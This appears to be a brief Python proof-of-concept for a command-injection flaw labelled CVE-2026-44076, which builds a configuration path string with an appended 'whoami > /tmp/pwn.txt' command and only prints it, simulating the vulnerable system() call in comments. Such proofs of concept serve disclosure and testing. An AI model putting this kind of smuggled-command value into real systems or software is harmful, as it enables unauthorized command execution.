# PoC for CVE-2026-44076
# Requires local high privileges to modify configuration
malicious_path = "/valid/path; whoami > /tmp/pwn.txt"
# Simulating vulnerable configuration write
print(f"[+] Injecting malicious path: {malicious_path}")
# Hypothetical vulnerable function execution
# system(malicious_path) would execute both commands
print("[!] If exploited, 'whoami' output is written to /tmp/pwn.txt")